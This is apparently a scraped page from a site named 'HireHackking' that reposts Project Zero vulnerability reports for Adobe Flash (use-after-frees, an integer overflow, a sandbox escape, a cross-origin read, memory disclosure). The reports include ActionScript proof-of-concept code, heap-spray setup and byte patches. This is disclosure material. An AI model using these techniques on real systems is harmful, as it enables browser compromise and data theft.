[0x60040000dfd0 41] exec 0x600e0000dfe7 95 [0x60040000dfd0 41] exec 0x600e0000dfea 102 [0x60040000dfd0 41] <--- RMATCH recursive match exec 0x600e0000dfeb 94 [0x60040000dfd0 41] exec 0x600e0000dff0 84 [0x60040000dfd0 41] exec 0x600e0000dff3 84 [0x60040000dfd0 41] exec 0x600e0000dff6 84 [0x60040000dfd0 41] exec 0x600e0000dff9 0 [0x60040000dfd0 41] <--- recursive match returns before 0x600e0000dfe7 24067 <--- ecode == 0x...dfe7 after 0x600e00013dea If we look at the start base for our regex, it was based at dfe4; so dfe7 is the OP_COND, as expected. Looking at the next block of code, we're clearly expecting the assertion to be followed by a group; likely OP_CBRA or another opcode that has a 16-bit length field following the opcode byte. ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2); In this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CBRA being shifted forward by a byte to 0x...dfeb; and this GET results in the value of 0x5e00 + 1 + LINK_SIZE being added to the ecode pointer, instead of the correct 0x0005 + 1 + LINK_SIZE, resulting in bytecode execution hopping outside of the allocated heap buffer. See attached for a crash PoC for the latest Chrome/Flash on x64 linux. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37839.zip
HireHackking

Flash Broker-Based - Sandbox Escape via Unexpected Directory Lock

HACKER · %s · %s

Source: https://code.google.com/p/google-security-research/issues/detail?id=279&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id FlashBroker - Junction Check Bypass With Locked Directory IE PM Sandbox Escape 1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions. There is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker uses CreateFile to open the destination folder for check. If CreateFile fails, the destination will be considered as a valid path. However, FlashBroker uses dwShareMode as 0 in CreateFile, which make CreateFile always fail if handle of the destination folder is held by other. The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction. 2. Credit Jietao Yang and Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37841.zip
HireHackking

Flash Player - Integer Overflow in Function.apply

HACKER · %s · %s

Source: https://code.google.com/p/google-security-research/issues/detail?id=302&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id [Tracking for: https://code.google.com/p/chromium/issues/detail?id=470837] VULNERABILITY DETAILS An integer overflow while calling Function.apply can lead to enter an ActionScript function without correctly validating the supplied arguments. VERSION Chrome Version: 41.0.2272.101 stable, Flash 17.0.0.134 Operating System: Win7 x64 SP1 REPRODUCTION CASE From exec.cpp taken from the Crossbridge sources, available at https://github.com/adobe-flash/crossbridge/blob/master/avmplus/core/exec.cpp 944 // Specialized to be called from Function.apply(). 945 Atom BaseExecMgr::apply(MethodEnv* env, Atom thisArg, ArrayObject *a) 946 { 947 int32_t argc = a->getLength(); ... 966 // Tail call inhibited by local allocation/deallocation. 967 MMgc::GC::AllocaAutoPtr _atomv; 968 Atom* atomv = (Atom*)avmStackAllocArray(core, _atomv, (argc+1), sizeof(Atom)); //here if argc = 0xFFFFFFFF we get an integer overflow 969 atomv[0] = thisArg; 970 for (int32_t i=0 ; i < argc ; i++ ) 971 atomv[i+1] = a->getUintProperty(i); 972 return env->coerceEnter(argc, atomv); 973 } So the idea is to use the rest argument to get a working poc. For example: public function myFunc(a0:ByteArray, a1:ByteArray, a2:ByteArray, a3:ByteArray, a4:ByteArray, a5:ByteArray, ... rest) { try {a0.writeUnsignedInt(0x41414141)}catch (e) {} try {a1.writeUnsignedInt(0x41414141)}catch (e) {} try {a2.writeUnsignedInt(0x41414141)}catch (e) {} try {a3.writeUnsignedInt(0x41414141)}catch (e) {} try {a4.writeUnsignedInt(0x41414141)}catch (e) {} } public function XApplyPoc() { var a:Array = new Array() a.length = 0xFFFFFFFF myFunc.apply(this, a) } Compile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37843.zip
HireHackking
Source: https://code.google.com/p/google-security-research/issues/detail?id=326&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id [Tracking for: https://code.google.com/p/chromium/issues/detail?id=475018] Credit is to bilou, working with the Chromium Vulnerability Rewards Program. --- VULNERABILITY DETAILS Issues in DefineBitsLossless and DefineBitsLossless2 leads to using uninitialized memory while rendering a picture. This is caused by the returned value of a zlib function not properly checked. VERSION Chrome version 41.0.2272.101, Flash 17.0.0.134 (the code below comes from flash player standalone exe 17.0.0.134) Operating System: Win 7 x64 SP1 REPRODUCTION CASE Compile the provided poc with flex sdk: mxmlc -static-link-runtime-shared-libraries=true -compress=false -target-player 15.0 -swf-version 25 XBitmapGif.as And change the bytes in the DefineBitsLossless2 tag, at offset 0x228: 14 00 14 00 78 to 14 00 14 00 41 To get a DefineBitsLossless tag, change the byte at offset 0x220: 09 47 00 00 00 to 05 47 00 00 00 Load the provided pocs and see the pointers partially disclosed. When handling such tags, Flash first allocates a buffer according to the picture's width and height but does not initialize it. If the compressed data stream is corrupted, the zlib function just returns an invalid token and Flash leaves the uninitialized buffer as is. Look at sub_54732C: .text:0054746C loc_54746C: .text:0054746C mov ecx, [esi] .text:0054746E push 0 .text:00547470 push 0 .text:00547472 push eax .text:00547473 push [ebp+var_10] .text:00547476 push [ebp+var_14] .text:00547479 push [ebp+var_C] .text:0054747C call sub_545459 ; allocate a buffer of 4 * 14h * 14h = 640h .text:00547481 cmp [ebp+var_1], 0 .text:00547485 mov ecx, [esi] .text:00547487 setnz al .text:0054748A mov [ecx+58h], al ... .text:005474DE loc_5474DE: .text:005474DE lea eax, [ebp+var_50] .text:005474E1 push 0 .text:005474E3 push eax .text:005474E4 call xinflate ; inflate the buffer, but there's no error check? .text:005474E9 pop ecx ; thus we can return 0xFFFFFFFD in eax with a corrupt stream .text:005474EA pop ecx .text:005474EB cmp eax, 1 .text:005474EE jz short loc_5474FB .text:005474F0 test eax, eax .text:005474F2 jnz short loc_54753A ; which will skip the buffer initialization Reading this data back is not straightforward. For a DefineBitsLossless tag, we can read values like 0xFFXXYYZZ. For a DefineBitsLossless2 tag an operation is performed on the pixels so we can only read f(pixel). That function is handled by sub_4CD3B0 and uses a hardcoded table. By conbining both the DefineBitsLossless and DefineBitsLossless2 tags I'm quite convinced we can guess a full pointer. --- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37846.zip
HireHackking

Adobe Flash AS2 - textfield.filters Use-After-Free (1)

HACKER · %s · %s

Source: https://code.google.com/p/google-security-research/issues/detail?id=330&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id [Tracking for: https://code.google.com/p/chromium/issues/detail?id=476926] Credit is to bilou, working with the Chromium Vulnerability Rewards Program. --- VULNERABILITY DETAILS There is a use after free vulnerability in the ActionScript 2 TextField.filters array property. This is Issue 457278 resurrected. VERSION Chrome Version: [?, Flash 17.0.0.169] Operating System: [Windows 7 x64 SP1] REPRODUCTION CASE When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs. Note: Flash 17.0.0.169 tried to patch the previous issue by setting an "in used" flag on the targeted filter (flashplayer17_sa.exe 17.0.0.169): .text:004D67F8 mov esi, [esp+1Ch+var_4] .text:004D67FC push 1 ; char .text:004D67FE mov ecx, ebp ; int .text:004D6800 mov byte ptr [esi+0Ch], 1 // this flag was added .text:004D6804 call xparseAS2Code .text:004D6809 mov byte ptr [esi+0Ch], 0 And when we check the function that deletes the filters: .text:004D66D0 push edi .text:004D66D1 mov edi, ecx .text:004D66D3 cmp byte ptr [edi+0Ch], 0 // check again the flag, and jump if it is set, so that the filter won't be deleted .text:004D66D7 jnz short loc_4D6716 .text:004D66D9 cmp dword ptr [edi], 0 .text:004D66DC jz short loc_4D6708 We can bypass that feature with the following code: flash.filters.GlowFilter = MyGlowFilter var a = tfield.filters // set the flag to 1 --- in MyGlowFilter --- flash.filters.GlowFilter = MyGlowFilter2 var a = _global.tfield.filters // set the flag to 1, and then set it to 0 //now we can free the filter :D, the flag is set to 0! _global.tfield.filters = [] Tested on Flash Player standalone 17.0.0.169, the updated Chrome is not available at the time of writing. But since the objects haven't changed too much the updated version should crash while dereferencing 0x41424344. Can't we call that a -1day :D? *************************************************************************** Content of FiltusPafusBis.fla import flash.filters.GlowFilter; var a1:Array = new Array() var a2:Array = new Array() for (i = 0; i<0x50/4;i++) { a2[i] = 0x41424344 } for (var i = 0; i<0x200;i++) { var tf:TextFormat = new TextFormat() a1[i] = tf } for (var i = 0; i<0x200;i++) { a1[i].tabStops = a2 } var tfield:TextField = createTextField("tf",1,1,2,3,4) var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true) tfield.filters = [glowfilter] function f() { for (var i = 0; i<0x20;i++) { _global.a1[0x100+i*4].tabStops = [1,2,3,4] } flash.filters.GlowFilter = MyGlowFilter2 var a = _global.tfield.filters _global.tfield.filters = [] for (var i = 0; i<0x200;i++) { _global.a1[i].tabStops = a2 } } _global.tfield = tfield _global.f = f _global.a1 = a1 _global.a2 = a2 flash.filters.GlowFilter = MyGlowFilter var a = tfield.filters *************************************************************************** Content of MyGlowFilter.as: import flash.filters.GlowFilter; class MyGlowFilter extends flash.filters.GlowFilter { public function MyGlowFilter (a,b,c,d,e,f,g,h) { super(a,b,c,d,e,f,g,h); _global.f() } } *************************************************************************** Content of MyGlowFilter2.as: import flash.filters.GlowFilter; class MyGlowFilter2 extends flash.filters.GlowFilter { public function MyGlowFilter2 (a,b,c,d,e,f,g,h) { super(a,b,c,d,e,f,g,h); } } *************************************************************************** Content of FiltusPafusBis_poc.fla import flash.filters.GlowFilter; var tfield:TextField = createTextField("tf",1,1,2,3,4) var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true) tfield.filters = [glowfilter] function f() { flash.filters.GlowFilter = MyGlowFilter2 var a = _global.tfield.filters _global.tfield.filters = [] } _global.tfield = tfield _global.f = f flash.filters.GlowFilter = MyGlowFilter var a = tfield.filters --- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37847.zip
HireHackking

Adobe Flash - NetConnection.connect Use-After-Free

HACKER · %s · %s

Source: https://code.google.com/p/google-security-research/issues/detail?id=352&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id If the fpadInfo property of a NetConnection object is a SharedObject, a use-after-free occurs when the property is deleted. A proof-of-concept is as follows: var s = SharedObject.getLocal("test"); ASSetPropFlags(s, null, 0, 0xff); ASSetPropFlags(s.data, null, 0, 0xff); var q = {myprop :"natalie", myprop2 : "test"}; s.data.fpadInfo = q; s.flush(); var n = new NetConnection(); ASnative(2100, 200)(s.data); n.connect.call(s.data, ""); trace(s.data.fpadInfo); s = 1; //GC happens here setInterval(f, 1000); function f(){ ASnative(252, 1).call(q); //Array push delete q.myprop; } A fla, an AS file and two swfs are attached. shareddelete.fla compiles to shareddelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and shareddelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37850.zip
HireHackking
Source: https://code.google.com/p/google-security-research/issues/detail?id=354&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id [90-day deadline tracking for https://code.google.com/p/chromium/issues/detail?id=481639] --- An instance of ActionScript's Sound class allows for loading and extracting for further processing any kind of external data, not only sound files. Same-origin policy doesn't apply here. Each input byte of raw data, loaded previously from given URL, is encoded by an unspecified function to the same 8 successive sample blocks of output. The sample block consists of 8 bytes (first 4 bytes for left channel and next 4 bytes for right channel). Only 2 bytes from 8 sound blocks (64 bytes) are crucial, the rest 52 bytes are useless. Each byte of input from range 0-255 has corresponding constant unsigned integer value (a result of encoding), so for decoding purposes you can use simply lookup table (cf. source code from BoundlessTunes.as). 1. Put attached file BoundlessTunes.swf on the HTTP server. 2. Open http://<SERVER_HOSTNAME>/BoundlessTunes.swf?url=<URL> where <URL> is an URL address (e.g. leading to cross-origin resource). A received response will be displayed in alert window. --- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37851.zip
HireHackking
Source: https://code.google.com/p/google-security-research/issues/detail?id=358&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id [Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=457680] --- VULNERABILITY DETAILS There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. VERSION Chrome Version: 40.0.2214.111 stable, Flash 16.0.0.305 Operating System: Win7 SP1 x64] The AS2 mapBitmap_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below). Just put mapBitmap_as2.swf in a browsable directory and run the swf with Chrome. It should crash while dereferencing 0x41424344. Here are a few steps to trigger the issue: 1) Create a BitmapData and store it somewhere, for example as a static member of a custom class. 2) Create a second BitmapData and use it to create a DisplacementMapFilter. We don't care about this BitmapData, it is just needed to create the filter. 3) Override the BitmapData constructor with a custom class. That class should put the first BitmapData on top of the AS2 stack when the constructor returns. 4) Create an object o and change its valueOf method so that it points to a function that calls the DisplacementMapFilter.mapBitmap property. 5) Use the first BitmapData and call getPixel32(o). What happens during step 5? Flash caches first the BitmapData in the stack before calling o.valueOf. At that moment the BitmapData isn't used elsewhere so its refcount equals 1. Flash enters then o.valueOf which leads to get the mapBitmap property. At that moment we hit the following lines, in sub_10193F2D: CPU Disasm Address Hex dump Command 6D2D3FBB 68 BE27C66D PUSH OFFSET 6DC627BE 6D2D3FC0 FF73 04 PUSH DWORD PTR DS:[EBX+4] 6D2D3FC3 56 PUSH ESI 6D2D3FC4 8B33 MOV ESI,DWORD PTR DS:[EBX] 6D2D3FC6 E8 A572F8FF CALL 6D25B270 ; that function creates a new atom and calls the BitmapData constructor 6D2D3FCB 84C0 TEST AL,AL 6D2D3FCD 74 09 JE SHORT 6D2D3FD8 6D2D3FCF 8B0B MOV ECX,DWORD PTR DS:[EBX] 6D2D3FD1 6A 01 PUSH 1 6D2D3FD3 E8 281A0100 CALL 6D2E5A00 ; if the constructor is overriden by a custom class, the custom constructor is called here 6D2D3FD8 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] 6D2D3FDB 8B13 MOV EDX,DWORD PTR DS:[EBX] 6D2D3FDD 56 PUSH ESI 6D2D3FDE E8 418EF6FF CALL 6D23CE24 ; then pop the new atom from the AS2 stack ... 6D2D4000 23F8 AND EDI,EAX 6D2D4002 807F 35 1B CMP BYTE PTR DS:[EDI+35],1B ; and ensure this is indeed a BitmapData 6D2D4006 74 0A JE SHORT 6D2D4012 ... In the next lines Flash does two things. It destroys the BitmapData object associated to the BitmapData atom and replaces it with the one defined in the DisplacementMapFilter: 6D2D4012 8B47 28 MOV EAX,DWORD PTR DS:[EDI+28] 6D2D4015 83E0 FE AND EAX,FFFFFFFE 6D2D4018 8B40 18 MOV EAX,DWORD PTR DS:[EAX+18] ; get the BitmapData object 6D2D401B 33C9 XOR ECX,ECX 6D2D401D 51 PUSH ECX 6D2D401E E8 1DB2FEFF CALL 6D2BF240 ; call the BitmapData destructor 6D2D4023 8B75 10 MOV ESI,DWORD PTR SS:[EBP+10] 6D2D4026 8BC7 MOV EAX,EDI 6D2D4028 E8 134AF6FF CALL 6D238A40 ; and associate the DisplacementMapFilter.mapBitmap object All of this works as long as the BitmapData object read from the AS2 stack is not in use somewhere. But since we can provide our own constructor, we can do anything with the AS2 stack, including having an in use BitmapData at the top of the stack when the constructor returns. This can be done by manipulating the AS2 byte code of the constructor for example. So if the returned BitmapData has a refcounter set to 1, Flash frees the object and we end up with a garbage reference in the stack which crashes the player in BitmapData.getPixel32. After compiling mapBitmap_as2.swf, I had to change the bytes at offset 0x90F in the (MyBitmapData constructor): 52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP) Hopefully if it works we should crash here with eax controlled: CPU Disasm Address Hex dump Command 6D2BFA83 3B58 0C CMP EBX,DWORD PTR DS:[EAX+0C] //eax = 0x41424344 6D2BFA86 7D 57 JGE SHORT 6D2BFADF 6D2BFA88 85FF TEST EDI,EDI 6D2BFA8A 78 53 JS SHORT 6D2BFADF 6D2BFA8C 3B78 08 CMP EDI,DWORD PTR DS:[EAX+8] 6D2BFA8F 7D 4E JGE SHORT 6D2BFADF 6D2BFA91 8BC8 MOV ECX,EAX 6D2BFA93 8B01 MOV EAX,DWORD PTR DS:[ECX] 6D2BFA95 8B50 10 MOV EDX,DWORD PTR DS:[EAX+10] 6D2BFA98 FFD2 CALL EDX I don't kwow if we can abuse ASLR with that. If we can do something without getting a virtual function dereferenced, it must be possible. *************************************************************************** Content of MyBitmapData.as class MyBitmapData extends String { static var mf; function MyBitmapData() { super(); var a = MyBitmapData.mf test(a,a,a,a,a,a,a,a) //that part should be deleted manually in the bytecode trace(a) //so that MyBitmapData.mf stays on top of the AS2 stack } public function test(a,b,c,d,e,f,g,h) { } static function setBitmapData(myfilter) { mf = myfilter; } } *************************************************************************** Content of mapBitmap_as2.fla import flash.filters.DisplacementMapFilter; import flash.display.BitmapData; var bd:BitmapData = new BitmapData(10,10) MyBitmapData.setBitmapData(bd) var bd2:BitmapData = new BitmapData(10,10) var dmf:DisplacementMapFilter = new DisplacementMapFilter(bd2,new flash.geom.Point(1,2),1,2,3,4) newConstr = MyBitmapData flash.display.BitmapData = newConstr function f() { var a = dmf.mapBitmap; } var a:Array = new Array() var b:Array = new Array() for (var i = 0; i<0xC8/4;i++) { b[i] = 0x41424344 } var o = new Object() o.valueOf = function () { f() for (var i = 0; i<0x10;i++) { var tf:TextFormat = new TextFormat() tf.tabStops = b a[i] = tf } return 4 } bd.getPixel32(o,4) --- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37853.zip
HireHackking

Adobe Flash - Setting Value Use-After-Free

HACKER · %s · %s

Source: https://code.google.com/p/google-security-research/issues/detail?id=360&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id In certain cases where a native AS2 class sets an internal atom to a value, it can lead to a use-after-free if the variable is a SharedObject. While this example shows setting NetConnection.uri, this issue occurs in several other A proof of concept is as follows: var s = SharedObject.getLocal("test"); ASSetPropFlags(s, null, 0, 0xff); ASSetPropFlags(s.data, null, 0, 0xff); var q = {myprop :"natalie", myprop2 : "test"}; var n = new NetConnection(); s.data.uri = q; trace("uri " + s.data.uri); s.flush(); ASnative(2100, 200)(s.data); trace("uri " + s.data.uri); n.connect.call(s.data, xx); trace(s.data.uri); s = 1; var a = []; var c = []; for(i = 0; i < 200; i++){ var b = new flash.display.BitmapData(1000, 1000, true, 10); } setInterval(f, 1000); function f(){ ASnative(252, 1).call(q); //Array push } A fla, an AS file and two swfs are attached. slot.fla compiles to setnum.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and slot.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37855.zip
HireHackking

Adobe Flash - '.SWF' Out-of-Bounds Memory Read (2)

HACKER · %s · %s

Source: https://code.google.com/p/google-security-research/issues/detail?id=362&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id The following access violation was observed in the Adobe Flash Player plugin: (1dec.1af0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for FlashPlayer.exe - eax=00006261 ebx=00001501 ecx=010ae1e4 edx=00006262 esi=0736dda0 edi=05a860d0 eip=0044ae55 esp=010ae170 ebp=010ae564 iopl=0 nv up ei ng nz ac pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210297 FlashPlayer!WinMainSandboxed+0x57aee: 0044ae55 803c3000 cmp byte ptr [eax+esi],0 ds:002b:07374001=?? 0:000> !address esi [...] Usage: <unknown> Base Address: 06e60000 End Address: 07374000 Region Size: 00514000 State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE Type: 00020000 MEM_PRIVATE Allocation Base: 06e60000 Allocation Protect: 00000001 PAGE_NOACCESS 0:000> db esi 0736dda0 8e 56 fa 1b 00 13 e3 85-00 0c 54 72 65 62 75 63 .V........Trebuc 0736ddb0 68 65 74 20 4d 53 3e 00-7e 00 80 00 9f 00 21 01 het MS>.~.....!. 0736ddc0 4c 01 76 01 85 01 97 01-e9 01 02 02 40 02 9a 02 L.v.........@... 0736ddd0 c4 02 1d 03 49 03 d8 03-26 04 4f 04 b5 04 fd 04 ....I...&.O..... 0736dde0 1d 05 39 05 90 05 b1 05-e2 05 f6 05 22 06 40 06 ..9.........".@. 0736ddf0 97 06 da 06 2d 07 94 07-ac 07 d8 07 02 08 21 08 ....-.........!. 0736de00 3f 08 af 08 fb 08 40 09-92 09 e2 09 1c 0a c9 0a ?.....@......... 0736de10 00 0b 35 0b 5b 0b 77 0b-cd 0b 04 0c 52 0c 9d 0c ..5.[.w.....R... Notes: - Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows. - The out-of-bounds read appears to be caused by an overly large index value (stored in the "EAX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "ESI". - The memory under "ESI" contains a section of the input file starting at offset 0x50dda0. - Attached samples: signal_sigsegv_7ffff6d8a235_3103_51dea5ced16249520f1fa0a7a63d7b36 (crashing file), 51dea5ced16249520f1fa0a7a63d7b36 (original file). The total difference between the two files is 19 bytes. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37857.zip